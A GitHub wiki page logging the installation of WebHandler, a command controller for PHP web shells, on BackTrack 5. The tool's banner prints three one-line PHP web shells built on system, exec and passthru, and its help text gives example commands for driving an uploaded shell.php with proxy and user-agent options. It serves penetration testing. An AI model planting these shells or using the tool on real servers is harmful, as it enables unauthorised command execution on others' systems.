g0tmi1k edited this page Jul 16, 2012 · 3 revisions

Backtrack 5

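Below are the commands and output from installing WebHandler on BackTrack 5. argparse is installed separately because this system's Python is 2.6 (see the install path in the output), where argparse is not part of the standard library. In this session easy_install runs as root and fetches the package over plain HTTP, and the output shows no integrity check on the downloaded archive.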

Commands:

Output

root@bt:~# git clone https://github.com/lnxg33k/webhandler.git
Initialized empty Git repository in /root/webhandler/.git/
remote: Counting objects: 921, done.
remote: Compressing objects: 100% (440/440), done.
remote: Total 921 (delta 467), reused 897 (delta 444)
Receiving objects: 100% (921/921), 496.80 KiB | 375 KiB/s, done.
Resolving deltas: 100% (467/467), done.
root@bt:~# cd webhandler/
root@bt:~/webhandler# ls -alh
total 28K
drwxr-xr-x  5 root root 4.0K 2012-07-13 22:13 .
drwx------ 41 root root 4.0K 2012-07-13 22:13 ..
drwxr-xr-x  4 root root 4.0K 2012-07-13 22:13 core
drwxr-xr-x  2 root root 4.0K 2012-07-13 22:13 dev
drwxr-xr-x  8 root root 4.0K 2012-07-13 22:13 .git
-rw-r--r--  1 root root 1.7K 2012-07-13 22:13 README.md
-rwxr-xr-x  1 root root 1.4K 2012-07-13 22:13 webhandler.py
root@bt:~/webhandler# easy_install argparse
Searching for argparse
Reading http://pypi.python.org/simple/argparse/
Reading http://code.google.com/p/argparse/
Best match: argparse 1.2.1
Downloading http://argparse.googlecode.com/files/argparse-1.2.1.tar.gz
Processing argparse-1.2.1.tar.gz
Running argparse-1.2.1/setup.py -q bdist_egg --dist-dir /tmp/easy_install-ahaGJx/argparse-1.2.1/egg-dist-tmp-ta0SmE
warning: no previously-included files matching '*.pyc' found anywhere in distribution
warning: no previously-included files matching '*.pyo' found anywhere in distribution
warning: no previously-included files matching '*.orig' found anywhere in distribution
warning: no previously-included files matching '*.rej' found anywhere in distribution
no previously-included directories found matching 'doc/_build'
no previously-included directories found matching 'env24'
no previously-included directories found matching 'env25'
no previously-included directories found matching 'env26'
no previously-included directories found matching 'env27'
zip_safe flag not set; analyzing archive contents...
Adding argparse 1.2.1 to easy-install.pth file

Installed /usr/local/lib/python2.6/dist-packages/argparse-1.2.1-py2.6.egg
Processing dependencies for argparse
Finished processing dependencies for argparse
root@bt:~/webhandler# python webhandler.py 

-- Command controler for PHP system functions. --
--   Which works for POST and GET requests:    --

1-   <?php system($_GET['parameter']); ?>
2-   <?php exec($_POST['parameter']); ?>
3-   <?php passthru($_REQUEST['parameter']); ?>

Run: webhandler.py -h for help
root@bt:~/webhandler# python webhandler.py -h
usage: webhandler.py -h

Positional arguments:
  -u , --url           		Full URL for the uploaded PHP code

Optional arguments:
  -h, --help           		Print this help message then exit
  -c, --turbo          		Increase the execution speed if the out-put doesn't contain garbage
  -m , --method        		The method used in the uploaded PHP code (e.g. post)
  -p , --parameter     		Parameter that used in the shell (e.g. cmd)
  -x , --proxy         		Proxy (e.g. 'http://127.0.0.1:8080')
  -g , --user-agent    		user-agent (e.g. 'Mozilla/5.0')
  -rg, --random-agent  		WebHandler will use some random user-agent
  -up, --update        		Update webhandler from git cli  "GitHub repo"

Examples:
    python webhandler.py --url http://www.mywebsite.com/shell.php?cmd=
    python webhandler.py --url http://www.mywebsite.com/shell.php --method POST --parameter cmd
    python webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --random-agent --turbo
    python webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --proxy http://127.0.0.1:8080
root@bt:~/webhandler#